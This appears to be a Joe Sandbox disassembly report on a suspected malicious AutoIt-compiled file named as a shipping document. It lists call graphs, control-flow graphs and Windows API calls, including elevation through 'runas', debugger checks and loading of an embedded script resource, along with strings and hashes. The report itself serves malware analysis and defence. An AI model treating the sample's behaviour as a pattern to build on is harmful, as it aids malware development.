100821->100827 100822 9e06fd 100859 9d899d 59 API calls 2 library calls 100822->100859 100825 9e0773 _wprintf 100825->100808 100826 9e0704 100828 9d9fab __alloc_osfhnd 2 API calls 100826->100828 100832 9e06f6 100826->100832 100827->100822 100829 9d9e13 __mtinitlocknum 59 API calls 100827->100829 100827->100832 100857 9d6dcd 60 API calls __lock 100827->100857 100858 9d6e37 LeaveCriticalSection LeaveCriticalSection _doexit 100827->100858 100831 9e072a EnterCriticalSection 100828->100831 100829->100827 100831->100832 100854 9e077e 100832->100854 100843 9e07a7 __wopenfile 100834->100843 100835 9e07c1 100864 9d8ca8 59 API calls __getptd_noexit 100835->100864 100837 9e097c 100837->100835 100841 9e09df 100837->100841 100838 9e07c6 100865 9d8f36 9 API calls ___crtsetenv 100838->100865 100840 9d5480 100853 9d54a2 LeaveCriticalSection LeaveCriticalSection __wfsopen 100840->100853 100861 9e8721 100841->100861 100843->100835 100843->100837 100866 9d394b 61 API calls 2 library calls 100843->100866 100845 9e0975 100845->100837 100867 9d394b 61 API calls 2 library calls 100845->100867 100847 9e0994 100847->100837 100868 9d394b 61 API calls 2 library calls 100847->100868 100849->100804 100850->100814 100851->100814 100852->100814 100853->100814 100860 9d9ef5 LeaveCriticalSection 100854->100860 100856 9e0785 100856->100825 100857->100827 100858->100827 100859->100826 100860->100856 100869 9e7f05 100861->100869 100863 9e873a 100863->100840 100864->100838 100865->100840 100866->100845 100867->100847 100868->100837 100872 9e7f11 _wprintf 100869->100872 100870 9e7f27 100956 9d8ca8 59 API calls __getptd_noexit 100870->100956 100872->100870 100874 9e7f5d 100872->100874 100873 9e7f2c 100957 9d8f36 9 API calls ___crtsetenv 100873->100957 100880 9e7fce 100874->100880 100877 9e7f79 100958 9e7fa2 LeaveCriticalSection __unlock_fhandle 100877->100958 100879 9e7f36 _wprintf 100879->100863 100881 9e7fee 100880->100881 100882 9d465a __wsopen_nolock 59 API calls 100881->100882 100885 9e800a 100882->100885 100883 9d8f46 __invoke_watson 8 API calls 100884 9e8720 100883->100884 100887 9e7f05 __wsopen_helper 104 API calls 100884->100887 100886 9e8044 100885->100886 100893 9e8067 100885->100893 100929 9e8141 100885->100929 100889 9d8c74 __chsize_nolock 59 API calls 100886->100889 100888 9e873a 100887->100888 100888->100877 100890 9e8049 100889->100890 100891 9d8ca8 ___crtsetenv 59 API calls 100890->100891 100892 9e8056 100891->100892 100895 9d8f36 ___crtsetenv 9 API calls 100892->100895 100894 9e8125 100893->100894 100902 9e8103 100893->100902 100896 9d8c74 __chsize_nolock 59 API calls 100894->100896 100897 9e8060 100895->100897 100898 9e812a 100896->100898 100897->100877 100899 9d8ca8 ___crtsetenv 59 API calls 100898->100899 100900 9e8137 100899->100900 100901 9d8f36 ___crtsetenv 9 API calls 100900->100901 100901->100929 100903 9dd414 __alloc_osfhnd 62 API calls 100902->100903 100904 9e81d1 100903->100904 100905 9e81fe 100904->100905 100906 9e81db 100904->100906 100907 9e7e7d ___createFile GetModuleHandleW GetProcAddress CreateFileW 100905->100907 100908 9d8c74 __chsize_nolock 59 API calls 100906->100908 100917 9e8220 100907->100917 100909 9e81e0 100908->100909 100911 9d8ca8 ___crtsetenv 59 API calls 100909->100911 100910 9e829e GetFileType 100912 9e82eb 100910->100912 100913 9e82a9 GetLastError 100910->100913 100915 9e81ea 100911->100915 100925 9dd6aa __set_osfhnd 60 API calls 100912->100925 100916 9d8c87 __dosmaperr 59 API calls 100913->100916 100914 9e826c GetLastError 100918 9d8c87 __dosmaperr 59 API calls 100914->100918 100919 9d8ca8 ___crtsetenv 59 API calls 100915->100919 100920 9e82d0 CloseHandle 100916->100920 100917->100910 100917->100914 100921 9e7e7d ___createFile GetModuleHandleW GetProcAddress CreateFileW 100917->100921 100923 9e8291 100918->100923 100919->100897 100922 9e82de 100920->100922 100920->100923 100924 9e8261 100921->100924 100926 9d8ca8 ___crtsetenv 59 API calls 100922->100926 100927 9d8ca8 ___crtsetenv 59 API calls 100923->100927 100924->100910 100924->100914 100931 9e8309 100925->100931 100928 9e82e3 100926->100928 100927->100929 100928->100923 100929->100883 100930 9e84c4 100930->100929 100934 9e8697 CloseHandle 100930->100934 100931->100930 100932 9e1a41 __lseeki64_nolock 61 API calls 100931->100932 100948 9e838a 100931->100948 100933 9e8373 100932->100933 100937 9d8c74 __chsize_nolock 59 API calls 100933->100937 100949 9e8392 100933->100949 100935 9e7e7d ___createFile GetModuleHandleW GetProcAddress CreateFileW 100934->100935 100936 9e86be 100935->100936 100939 9e854e 100936->100939 100940 9e86c6 GetLastError 100936->100940 100937->100948 100938 9e0fdb 71 API calls __read_nolock 100938->100949 100939->100929 100941 9d8c87 __dosmaperr 59 API calls 100940->100941 100942 9e86d2 100941->100942 100944 9dd5bd __free_osfhnd 60 API calls 100942->100944 100943 9e0c5d __close_nolock 62 API calls 100943->100949 100944->100939 100945 9e9922 __chsize_nolock 83 API calls 100945->100949 100946 9e1a41 61 API calls __lseeki64_nolock 100946->100948 100947 9dda06 __write 79 API calls 100947->100948 100948->100930 100948->100946 100948->100947 100948->100949 100949->100938 100949->100943 100949->100945 100949->100948 100950 9e8541 100949->100950 100951 9e852a 100949->100951 100953 9e1a41 61 API calls __lseeki64_nolock 100949->100953 100952 9e0c5d __close_nolock 62 API calls 100950->100952 100951->100930 100954 9e8548 100952->100954 100953->100949 100955 9d8ca8 ___crtsetenv 59 API calls 100954->100955 100955->100939 100956->100873 100957->100879 100958->100879 100960 9b4ce1 100959->100960 100961 9b4d9d LoadLibraryA 100959->100961 100960->100760 100960->100761 100961->100960 100962 9b4dae GetProcAddress 100961->100962 100962->100960 100964 9b5003 FindResourceExW 100963->100964 100966 9b5020 100963->100966 100965 9edc8c LoadResource 100964->100965 100964->100966 100965->100966 100967 9edca1 SizeofResource 100965->100967 100966->100769 100967->100966 100968 9edcb5 LockResource 100967->100968 100968->100966 100970 9edd04 100969->100970 100971 9b5054 100969->100971 100975 9d59bd 100971->100975 100973 9b5062 100973->100775 100974->100769 100978 9d59c9 _wprintf 100975->100978 100976 9d59db 100988 9d8ca8 59 API calls __getptd_noexit 100976->100988 100978->100976 100979 9d5a01 100978->100979 100990 9d6d8e 100979->100990 100981 9d59e0 100989 9d8f36 9 API calls ___crtsetenv 100981->100989 100982 9d5a07 100996 9d592e 84 API calls 5 library calls 100982->100996 100985 9d5a16 100997 9d5a38 LeaveCriticalSection LeaveCriticalSection __wfsopen 100985->100997 100987 9d59eb _wprintf 100987->100973 100988->100981 100989->100987 100991 9d6d9e 100990->100991 100992 9d6dc0 EnterCriticalSection 100990->100992 100991->100992 100993 9d6da6 100991->100993 100994 9d6db6 100992->100994 100995 9d9d8b __lock 59 API calls 100993->100995 100994->100982 100995->100994 100996->100985 100997->100987 101001 9d576d 100998->101001 101000 9b508e 101000->100788 101002 9d5779 _wprintf 101001->101002 101003 9d57bc 101002->101003 101004 9d578f _memset 101002->101004 101005 9d57b4 _wprintf 101002->101005 101006 9d6d8e __lock_file 60 API calls 101003->101006 101014 9d8ca8 59 API calls __getptd_noexit 101004->101014 101005->101000 101008 9d57c2 101006->101008 101016 9d558d 73 API calls 6 library calls 101008->101016 101010 9d57a9 101015 9d8f36 9 API calls ___crtsetenv 101010->101015 101011 9d57d8 101017 9d57f6 LeaveCriticalSection LeaveCriticalSection __wfsopen 101011->101017 101014->101010 101015->101005 101016->101011 101017->101005 101021 9d537a GetSystemTimeAsFileTime 101018->101021 101020 a19017 101020->100790 101022 9d53a8 __aulldiv 101021->101022 101022->101020 101024 9d5ddc _wprintf 101023->101024 101025 9d5dee 101024->101025 101026 9d5e03 101024->101026 101037 9d8ca8 59 API calls __getptd_noexit 101025->101037 101027 9d6d8e __lock_file 60 API calls 101026->101027 101030 9d5e09 101027->101030 101029 9d5df3 101038 9d8f36 9 API calls ___crtsetenv 101029->101038 101039 9d5a40 68 API calls 6 library calls 101030->101039 101033 9d5dfe _wprintf 101033->100794 101034 9d5e14 101040 9d5e34 LeaveCriticalSection LeaveCriticalSection __wfsopen 101034->101040 101036 9d5e26 101036->101033 101037->101029 101038->101033 101039->101034 101040->101036 101041->100690 101042->100692 101043->100689 101044->100698 101045->100697 101051 a197f1 __tzset_nolock _wcscmp 101046->101051 101047 9b506b 75 API calls 101047->101051 101048 a19685 101048->100708 101048->100736 101049 a191b2 GetSystemTimeAsFileTime 101049->101051 101050 9b5045 86 API calls 101050->101051 101051->101047 101051->101048 101051->101049 101051->101050 101053 a18bc8 101052->101053 101054 a18bba 101052->101054 101056 a18c0d 101053->101056 101057 9d53cb 116 API calls 101053->101057 101079 a18bd1 101053->101079 101055 9d53cb 116 API calls 101054->101055 101055->101053 101083 a18e3a 75 API calls 3 library calls 101056->101083 101058 a18bf2 101057->101058 101058->101056 101060 a18bfb 101058->101060 101060->101079 101093 9d5516 101060->101093 101061 a18c51 101062 a18c55 101061->101062 101063 a18c76 101061->101063 101066 a18c62 101062->101066 101068 9d5516 __fcloseall 84 API calls 101062->101068 101084 a18a52 101063->101084 101069 9d5516 __fcloseall 84 API calls 101066->101069 101066->101079 101068->101066 101069->101079 101070 a18ca4 101106 a18cd4 91 API calls 101070->101106 101071 a18c84 101073 a18c91 101071->101073 101075 9d5516 __fcloseall 84 API calls 101071->101075 101077 9d5516 __fcloseall 84 API calls 101073->101077 101073->101079 101074 a18cab 101107 a18db6 59 API calls _free 101074->101107 101075->101073 101077->101079 101078 a18cb2 101080 a18cbf 101078->101080 101081 9d5516 __fcloseall 84 API calls 101078->101081 101079->100737 101080->101079 101082 9d5516 __fcloseall 84 API calls 101080->101082 101081->101080 101082->101079 101083->101061 101085 9d588c _W_store_winword 59 API calls 101084->101085 101086 a18a61 101085->101086 101087 9d588c _W_store_winword 59 API calls 101086->101087 101088 a18a75 101087->101088 101089 9d588c _W_store_winword 59 API calls 101088->101089 101090 a18a89 101089->101090 101092 a18a9c 101090->101092 101108 a18db6 59 API calls _free 101090->101108 101092->101070 101092->101071 101094 9d5522 _wprintf 101093->101094 101095 9d554e 101094->101095 101096 9d5536 101094->101096 101099 9d6d8e __lock_file 60 API calls 101095->101099 101101 9d5546 _wprintf 101095->101101 101125 9d8ca8 59 API calls __getptd_noexit 101096->101125 101098 9d553b 101126 9d8f36 9 API calls ___crtsetenv 101098->101126 101102 9d5560 101099->101102 101101->101079 101109 9d54aa 101102->101109 101106->101074 101107->101078 101108->101092 101110 9d54cd 101109->101110 101111 9d54b9 101109->101111 101112 9d54c9 101110->101112 101128 9d4bad 101110->101128 101171 9d8ca8 59 API calls __getptd_noexit 101111->101171 101127 9d5585 LeaveCriticalSection LeaveCriticalSection __wfsopen 101112->101127 101114 9d54be 101172 9d8f36 9 API calls ___crtsetenv 101114->101172 101121 9d54e7 101145 9e0b82 101121->101145 101123 9d54ed 101123->101112 101124 9d2ed5 _free 59 API calls 101123->101124 101124->101112 101125->101098 101126->101101 101127->101101 101129 9d4bc0 101128->101129 101133 9d4be4 101128->101133 101130 9d4856 __fclose_nolock 59 API calls 101129->101130 101129->101133 101131 9d4bdd 101130->101131 101173 9dda06 79 API calls 6 library calls 101131->101173 101134 9e0cf7 101133->101134 101135 9e0d04 101134->101135 101137 9d54e1 101134->101137 101136 9d2ed5 _free 59 API calls 101135->101136 101135->101137 101136->101137 101138 9d4856 101137->101138 101139 9d4875 101138->101139 101140 9d4860 101138->101140 101139->101121 101174 9d8ca8 59 API calls __getptd_noexit 101140->101174 101142 9d4865 101175 9d8f36 9 API calls ___crtsetenv 101142->101175 101144 9d4870 101144->101121 101146 9e0b8e _wprintf 101145->101146 101147 9e0b9b 101146->101147 101148 9e0bb2 101146->101148 101200 9d8c74 59 API calls __getptd_noexit 101147->101200 101150 9e0c3d 101148->101150 101152 9e0bc2 101148->101152 101205 9d8c74 59 API calls __getptd_noexit 101150->101205 101151 9e0ba0 101201 9d8ca8 59 API calls __getptd_noexit 101151->101201 101155 9e0bea 101152->101155 101156 9e0be0 101152->101156 101176 9dd386 101155->101176 101202 9d8c74 59 API calls __getptd_noexit 101156->101202 101157 9e0be5 101206 9d8ca8 59 API calls __getptd_noexit 101157->101206 101160 9e0bf0 101162 9e0c0e 101160->101162 101163 9e0c03 101160->101163 101203 9d8ca8 59 API calls __getptd_noexit 101162->101203 101185 9e0c5d 101163->101185 101164 9e0c49 101207 9d8f36 9 API calls ___crtsetenv 101164->101207 101167 9e0ba7 _wprintf 101167->101123 101169 9e0c09 101204 9e0c35 LeaveCriticalSection __unlock_fhandle 101169->101204 101171->101114 101172->101112 101173->101133 101174->101142 101175->101144 101178 9dd392 _wprintf 101176->101178 101177 9dd3e1 EnterCriticalSection 101180 9dd407 _wprintf 101177->101180 101178->101177 101179 9d9d8b __lock 59 API calls 101178->101179 101181 9dd3b7 101179->101181 101180->101160 101182 9dd3cf 101181->101182 101183 9d9fab __alloc_osfhnd 2 API calls 101181->101183 101208 9dd40b LeaveCriticalSection _doexit 101182->101208 101183->101182 101209 9dd643 101185->101209 101187 9e0cc1 101222 9dd5bd 60 API calls 2 library calls 101187->101222 101188 9e0c6b 101188->101187 101191 9dd643 __lseeki64_nolock 59 API calls 101188->101191 101199 9e0c9f 101188->101199 101190 9e0cc9 101196 9e0ceb 101190->101196 101223 9d8c87 59 API calls 3 library calls 101190->101223 101193 9e0c96 101191->101193 101192 9dd643 __lseeki64_nolock 59 API calls 101194 9e0cab CloseHandle 101192->101194 101197 9dd643 __lseeki64_nolock 59 API calls 101193->101197 101194->101187 101198 9e0cb7 GetLastError 101194->101198 101196->101169 101197->101199 101198->101187 101199->101187 101199->101192 101200->101151 101201->101167 101202->101157 101203->101169 101204->101167 101205->101157 101206->101164 101207->101167 101208->101177 101210 9dd64e 101209->101210 101211 9dd663 101209->101211 101212 9d8c74 __chsize_nolock 59 API calls 101210->101212 101213 9d8c74 __chsize_nolock 59 API calls 101211->101213 101215 9dd688 101211->101215 101214 9dd653 101212->101214 101216 9dd692 101213->101216 101217 9d8ca8 ___crtsetenv 59 API calls 101214->101217 101215->101188 101218 9d8ca8 ___crtsetenv 59 API calls 101216->101218 101219 9dd65b 101217->101219 101220 9dd69a 101218->101220 101219->101188 101221 9d8f36 ___crtsetenv 9 API calls 101220->101221 101221->101219 101222->101190 101223->101196 101225 9e1ac0 __ftell_nolock 101224->101225 101226 9d091e GetLongPathNameW 101225->101226 101227 9b7d2c 60 API calls 101226->101227 101228 9b741d 101227->101228 101229 9b716b 101228->101229 101230 9b77c7 60 API calls 101229->101230 101231 9b717d 101230->101231 101232 9b48ae 61 API calls 101231->101232 101233 9b7188 101232->101233 101234 9b7193 101233->101234 101238 9eebde 101233->101238 101235 9b3f84 60 API calls 101234->101235 101237 9b719f 101235->101237 101276 9b34c2 101237->101276 101239 9eebf8 101238->101239 101282 9b7a68 62 API calls 101238->101282 101241 9b71b2 Mailbox 101241->100606 101243 9b4f3d 137 API calls 101242->101243 101244 9b69ef 101243->101244 101245 9ee38a 101244->101245 101246 9b4f3d 137 API calls 101244->101246 101247 a19604 123 API calls 101245->101247 101248 9b6a03 101246->101248 101249 9ee39f 101247->101249 101248->101245 101250 9b6a0b 101248->101250 101251 9ee3a3 101249->101251 101252 9ee3c0 101249->101252 101254 9ee3ab 101250->101254 101255 9b6a17 101250->101255 101256 9b4faa 85 API calls 101251->101256 101253 9d0f36 Mailbox 60 API calls 101252->101253 101275 9ee405 Mailbox 101253->101275 101376 a14339 91 API calls _wprintf 101254->101376 101283 9b6bec 101255->101283 101256->101254 101260 9ee3b9 101260->101252 101261 9ee5b9 101262 9d2ed5 _free 59 API calls 101261->101262 101263 9ee5c1 101262->101263 101264 9b4faa 85 API calls 101263->101264 101269 9ee5ca 101264->101269 101268 9d2ed5 _free 59 API calls 101268->101269 101269->101268 101270 9b4faa 85 API calls 101269->101270 101382 a0fad2 90 API calls 4 library calls 101269->101382 101270->101269 101272 9b7f41 60 API calls 101272->101275 101275->101261 101275->101269 101275->101272 101377 a0fa6e 60 API calls 2 library calls 101275->101377 101378 a0f98f 62 API calls 2 library calls 101275->101378 101379 a17428 60 API calls Mailbox 101275->101379 101380 9b766f 60 API calls 2 library calls 101275->101380 101381 9b74bd 60 API calls Mailbox 101275->101381 101277 9b34d4 101276->101277 101281 9b34f3 _memmove 101276->101281 101279 9d0f36 Mailbox 60 API calls 101277->101279 101278 9d0f36 Mailbox 60 API calls 101280 9b350a 101278->101280 101279->101281 101280->101241 101281->101278 101282->101238 101284 9ee777 101283->101284 101285 9b6c15 101283->101285 101395 a0fad2 90 API calls 4 library calls 101284->101395 101383 9b5906 61 API calls Mailbox 101285->101383 101288 9b6c37 101290 9b5956 68 API calls 101288->101290 101289 9ee78a 101396 a0fad2 90 API calls 4 library calls 101289->101396 101291 9b6c4c 101290->101291 101291->101289 101292 9b6c54 101291->101292 101294 9b77c7 60 API calls 101292->101294 101296 9b6c60 101294->101296 101295 9ee7a6 101298 9b6cc1 101295->101298 101384 9d0ad7 61 API calls __ftell_nolock 101296->101384 101300 9b6ccf 101298->101300 101301 9ee7b9 101298->101301 101299 9b6c6c 101303 9b77c7 60 API calls 101299->101303 101302 9b77c7 60 API calls 101300->101302 101304 9b5dcf CloseHandle 101301->101304 101306 9b6cd8 101302->101306 101307 9b6c78 101303->101307 101305 9ee7c5 101304->101305 101308 9b4f3d 137 API calls 101305->101308 101309 9b77c7 60 API calls 101306->101309 101310 9b48ae 61 API calls 101307->101310 101311 9ee7e1 101308->101311 101312 9b6ce1 101309->101312 101313 9b6c86 101310->101313 101314 9ee80a 101311->101314 101317 a19604 123 API calls 101311->101317 101387 9b46f9 60 API calls Mailbox 101312->101387 101385 9b59b0 ReadFile SetFilePointerEx 101313->101385 101397 a0fad2 90 API calls 4 library calls 101314->101397 101321 9ee7fd 101317->101321 101318 9b6cf8 101322 9b7c8e 60 API calls 101318->101322 101320 9b6cb2 101386 9b5c4e SetFilePointerEx SetFilePointerEx 101320->101386 101325 9ee826 101321->101325 101326 9ee805 101321->101326 101327 9b6d09 SetCurrentDirectoryW 101322->101327 101323 9ee821 101355 9b6e6c Mailbox 101323->101355 101329 9b4faa 85 API calls 101325->101329 101328 9b4faa 85 API calls 101326->101328 101332 9b6d1c Mailbox 101327->101332 101328->101314 101330 9ee82b 101329->101330 101331 9d0f36 Mailbox 60 API calls 101330->101331 101338 9ee85f 101331->101338 101334 9d0f36 Mailbox 60 API calls 101332->101334 101333 9b5934 CloseHandle 101335 9b3bcd 101333->101335 101336 9b6d2f 101334->101336 101335->100465 101335->100474 101337 9b538e 60 API calls 101336->101337 101351 9b6d3a Mailbox __NMSG_WRITE 101337->101351 101398 9b766f 60 API calls 2 library calls 101338->101398 101340 9b6e47 101343 9eea99 101351->101340 101360 9eeb2a 101351->101360 101362 9b7f41 60 API calls 101351->101362 101364 9eeb32 101351->101364 101388 9b59cd 68 API calls _wcscpy 101351->101388 101389 9b70bd GetStringTypeW 101351->101389 101390 9b702c 61 API calls __wcsnicmp 101351->101390 101391 9b710a GetStringTypeW __NMSG_WRITE 101351->101391 101392 9d37bd GetStringTypeW _iswctype 101351->101392 101393 9b6a3c 166 API calls 3 library calls 101351->101393 101394 9b7373 60 API calls Mailbox 101351->101394 101355->101333 101358 9ee8a8 Mailbox 101358->101343 101367 9b7f41 60 API calls 101358->101367 101370 9eeaeb 101358->101370 101399 a0fa6e 60 API calls 2 library calls 101358->101399 101400 a0f98f 62 API calls 2 library calls 101358->101400 101401 a17428 60 API calls Mailbox 101358->101401 101362->101351 101367->101358 101376->101260 101377->101275 101378->101275 101379->101275 101380->101275 101381->101275 101382->101269 101383->101288 101384->101299 101385->101320 101386->101298 101387->101318 101388->101351 101389->101351 101390->101351 101391->101351 101392->101351 101393->101351 101394->101351 101395->101289 101396->101295 101397->101323 101398->101358 101399->101358 101400->101358 101401->101358

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 009B3B7A
                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 009B3B8C
                                                                                                                              • GetFullPathNameW.KERNEL32(00007FFF,?,?,00A752F8,00A752E0,?,?), ref: 009B3BFD
                                                                                                                                • Part of subcall function 009B7D2C: _memmove.LIBCMT ref: 009B7D66
                                                                                                                                • Part of subcall function 009C0A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,009B3C26,00A752F8,?,?,?), ref: 009C0ACE
                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 009B3C81
                                                                                                                              • MessageBoxA.USER32 ref: 009ED3EC
                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?,00A752F8,?,?,?), ref: 009ED424
                                                                                                                              • GetForegroundWindow.USER32 ref: 009ED4AA
                                                                                                                              • ShellExecuteW.SHELL32(00000000,?,?), ref: 009ED4B1
                                                                                                                                • Part of subcall function 009B3A58: GetSysColorBrush.USER32 ref: 009B3A62
                                                                                                                                • Part of subcall function 009B3A58: LoadCursorW.USER32 ref: 009B3A71
                                                                                                                                • Part of subcall function 009B3A58: LoadIconW.USER32 ref: 009B3A88
                                                                                                                                • Part of subcall function 009B3A58: LoadIconW.USER32 ref: 009B3A9A
                                                                                                                                • Part of subcall function 009B3A58: LoadIconW.USER32 ref: 009B3AAC
                                                                                                                                • Part of subcall function 009B3A58: LoadImageW.USER32 ref: 009B3AD2
                                                                                                                                • Part of subcall function 009B3A58: RegisterClassExW.USER32(?), ref: 009B3B28
                                                                                                                                • Part of subcall function 009B39E7: CreateWindowExW.USER32 ref: 009B3A15
                                                                                                                                • Part of subcall function 009B39E7: CreateWindowExW.USER32 ref: 009B3A36
                                                                                                                                • Part of subcall function 009B39E7: ShowWindow.USER32(00000000), ref: 009B3A4A
                                                                                                                                • Part of subcall function 009B39E7: ShowWindow.USER32(00000000), ref: 009B3A53
                                                                                                                                • Part of subcall function 009B43DB: _memset.LIBCMT ref: 009B4401
                                                                                                                                • Part of subcall function 009B43DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 009B44A6
                                                                                                                              Strings
                                                                                                                              • runas, xrefs: 009ED4A5
                                                                                                                              • This is a third-party compiled AutoIt script., xrefs: 009ED3E4
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                                                                              • String ID: This is a third-party compiled AutoIt script.$runas
                                                                                                                              • API String ID: 529118366-3287110873
                                                                                                                              • Opcode ID: 17f9c5b567b19347eee04e3ec3e52091b64e1dc7fe26d0ece904a889c653bd6a
                                                                                                                              • Instruction ID: 2c10d2c58a84c3e13f36c7ea4f8cc04658c0b4c8a1a8828335702c3dce1cb877
                                                                                                                              • Opcode Fuzzy Hash: 17f9c5b567b19347eee04e3ec3e52091b64e1dc7fe26d0ece904a889c653bd6a
                                                                                                                              • Instruction Fuzzy Hash: CF51E630D04648BECF11EBF4DD06BFD7B79AF84720B00C165F855B61A2DAB05A46CB61

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 899 9b4afe-9b4b5e call 9b77c7 GetVersionExW call 9b7d2c 904 9b4c69-9b4c6b 899->904 905 9b4b64 899->905 906 9edac0-9edacc 904->906 907 9b4b67-9b4b6c 905->907 908 9edacd-9edad1 906->908 909 9b4b72 907->909 910 9b4c70-9b4c71 907->910 912 9edad4-9edae0 908->912 913 9edad3 908->913 911 9b4b73-9b4baa call 9b7e8c call 9b7886 909->911 910->911 921 9edbbd-9edbc0 911->921 922 9b4bb0-9b4bb1 911->922 912->908 915 9edae2-9edae7 912->915 913->912 915->907 917 9edaed-9edaf4 915->917 917->906 919 9edaf6 917->919 923 9edafb-9edafe 919->923 924 9edbd9-9edbdd 921->924 925 9edbc2 921->925 922->923 926 9b4bb7-9b4bc2 922->926 927 9b4bf1-9b4c08 GetCurrentProcess IsWow64Process 923->927 928 9edb04-9edb22 923->928 929 9edbdf-9edbe8 924->929 930 9edbc8-9edbd1 924->930 933 9edbc5 925->933 934 9b4bc8-9b4bca 926->934 935 9edb43-9edb49 926->935 931 9b4c0a 927->931 932 9b4c0d-9b4c1e 927->932 928->927 936 9edb28-9edb2e 928->936 929->933 943 9edbea-9edbed 929->943 930->924 931->932 944 9b4c89-9b4c93 GetSystemInfo 932->944 945 9b4c20-9b4c30 call 9b4c95 932->945 933->930 937 9edb5e-9edb6a 934->937 938 9b4bd0-9b4bd3 934->938 941 9edb4b-9edb4e 935->941 942 9edb53-9edb59 935->942 939 9edb38-9edb3e 936->939 940 9edb30-9edb33 936->940 949 9edb6c-9edb6f 937->949 950 9edb74-9edb7a 937->950 946 9b4bd9-9b4be8 938->946 947 9edb8a-9edb8d 938->947 939->927 940->927 941->927 942->927 943->930 948 9b4c56-9b4c66 944->948 956 9b4c7d-9b4c87 GetSystemInfo 945->956 957 9b4c32-9b4c3f call 9b4c95 945->957 952 9edb7f-9edb85 946->952 953 9b4bee 946->953 947->927 955 9edb93-9edba8 947->955 949->927 950->927 952->927 953->927 958 9edbaa-9edbad 955->958 959 9edbb2-9edbb8 955->959 960 9b4c47-9b4c4b 956->960 964 9b4c41-9b4c45 GetNativeSystemInfo 957->964 965 9b4c76-9b4c7b 957->965 958->927 959->927 960->948 963 9b4c4d-9b4c50 FreeLibrary 960->963 963->948 964->960 965->964
                                                                                                                              APIs
                                                                                                                              • GetVersionExW.KERNEL32(?), ref: 009B4B2B
                                                                                                                                • Part of subcall function 009B7D2C: _memmove.LIBCMT ref: 009B7D66
                                                                                                                              • GetCurrentProcess.KERNEL32(?,00A3FAEC,00000000,00000000,?), ref: 009B4BF8
                                                                                                                              • IsWow64Process.KERNEL32(00000000), ref: 009B4BFF
                                                                                                                              • GetNativeSystemInfo.KERNEL32(00000000), ref: 009B4C45
                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 009B4C50
                                                                                                                              • GetSystemInfo.KERNEL32(00000000), ref: 009B4C81
                                                                                                                              • GetSystemInfo.KERNEL32(00000000), ref: 009B4C8D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1986165174-0
                                                                                                                              • Opcode ID: f363aa246e895d08b3531184893991218137808fe34a604a922d6345cbbaa80c
                                                                                                                              • Instruction ID: bf405dfa52f8fb870ce0bda8d28c500156a46fb7f17a2917d1c89ecd5685b7ae
                                                                                                                              • Opcode Fuzzy Hash: f363aa246e895d08b3531184893991218137808fe34a604a922d6345cbbaa80c
                                                                                                                              • Instruction Fuzzy Hash: 8B91D73194A7C0DEC732CB7896511EAFFE8AF25310B484E9DE1CB97A42D234E908D759

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 966 9b4fe9-9b5001 CreateStreamOnHGlobal 967 9b5003-9b501a FindResourceExW 966->967 968 9b5021-9b5026 966->968 969 9edc8c-9edc9b LoadResource 967->969 970 9b5020 967->970 969->970 971 9edca1-9edcaf SizeofResource 969->971 970->968 971->970 972 9edcb5-9edcc0 LockResource 971->972 972->970 973 9edcc6-9edcce 972->973 974 9edcd2-9edce4 973->974 974->970
                                                                                                                              APIs
                                                                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 009B4FF9
                                                                                                                              • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,009B4EEE,?,?,00000000,00000000), ref: 009B5010
                                                                                                                              • LoadResource.KERNEL32(?,00000000,?,?,009B4EEE,?,?,00000000,00000000,?,?,?,?,?,?,009B4F8F), ref: 009EDC90
                                                                                                                              • SizeofResource.KERNEL32(?,00000000,?,?,009B4EEE,?,?,00000000,00000000,?,?,?,?,?,?,009B4F8F), ref: 009EDCA5
